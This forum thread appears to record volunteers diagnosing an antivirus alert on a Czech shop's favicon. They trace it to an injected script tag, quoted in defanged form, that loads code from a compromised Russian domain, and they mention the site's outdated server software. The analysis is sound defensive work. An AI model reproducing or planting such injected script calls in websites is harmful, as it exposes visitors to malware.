HTML:Script-inf in website icon?

Hello. It happened before on another website, now at this, as following detection pop-up shows:

Object: hxxp://www.zendl.cz/favicon.ico

Infection: HTML:Script-inf

Is it possible to infect website icon with a virus? VirusTotal analyses the website with 2 detections out of 64 as shown here: https://virustotal.com/cs/url/5c99b1fe2a847e03529823be42ccd3736300052907f1545e5ecc27fa7f70b429/analysis/1490696307/

It’s a Czech military and hunting goods shopping website. Could anyone please inspect it for false positives? I can’t believe website icon can be infected by malware. Thank you.

https://sitecheck.sucuri.net/results/www.zendl.cz/favicon.ico

Malware entry: MW:BLACKLISTED:35
A suspicious code was identified loading content from a blacklisted domain

Malware entry: MW:BLK:2
The web site contains a remote javascript or iframe that is currently blacklisted.

Also being flagged by Google Safebrowsing: Flagged URLs found in: -http://www.zendl.cz/favicon.ico

1: -http://psy-ufa.ru/wp-includes/images/wlw/1/404.php → Google Safe Browsing diagnostic page for this URL

Advisory provided by Google

If your page is loading content, images or scripts, from a site that is currently being flagged as suspicious by Google, it will generate a malware warning – even if your site is not currently being flagged. About your only option is to remove that content until the site owners can get their site cleaned up and the warning removed.

10:
< sc​ript type=“text/javasc​ript” src=" hxtp://psy-ufa dot ru/wp-includes/images/wlw/1/4O4.php "> < /sc​ript>

Note: The sc​ript call above looks suspicious! It loads content from a flagged site.

polonus

SUSPICIOUS >> http://www.UnmaskParasites.com/security-report/?page=www.zendl.cz/favicon.ico

Iframe seems to go here > psy-ufa.ru/
https://virustotal.com/en/url/6f2c38ce642975c218140be104f9fdc2ea978d3eaa24c906c327db93cd51c948/analysis/1490702235/

Sucuri > https://sitecheck.sucuri.net/results/psy-ufa.ru
This specific URL was identified in malicious campaigns to disseminate malware.

Well we have that all explained then. Confirmed here: https://urlscan.io/result/163c9bcc-7b91-491a-8634-bafcbd5cc3e5#summary

Furthermore from the response header we see exploitability like this:
http://forums.interworx.com/threads/8505-A-security-vulnerability-has-been-found-in-mod_watch

OpenSSH 5.1p1 Debian 5 (protocol 2.0) is also open to vulnnlImage hacking it seems (shellcode) and “mod_fastcgi/”,“2.4.6” seems outdated. So it certainly is in need of some ‘hardening’ there, to get it somewhat more secure against hackers.

pol

Guys, no need to dig deeper here. The site is infected, that’s it.

They could get somewhat more secure while they will find the Avast Prague headquarters round the corner ,
two hops on the metro… ;D
Not digging deeper, just a good and sound advice. :wink: ;D

polonus

You know us, we like digging all the way down ;D

Yeah I know, keep up the good work guys…!! :slight_smile: 8)

I don’t understand that. Why it detects a malware in website icon? It appears it’s not present. Does 404 page (loaded automatically when some link seems unreachable) contain malware? Looks like hacked websites. Should I contact webmaster to make him clean his sites and make them better safe?

There is a link to a malicious domaine, see here >> https://forum.avast.com/index.php?topic=199705.msg1381539#msg1381539

yes you may contact website owner, and you may give him link to this topic

Okay, website owner contacted. Hope he will start fixing the issue soon :slight_smile: Thank you for help :slight_smile:

You’re welcome.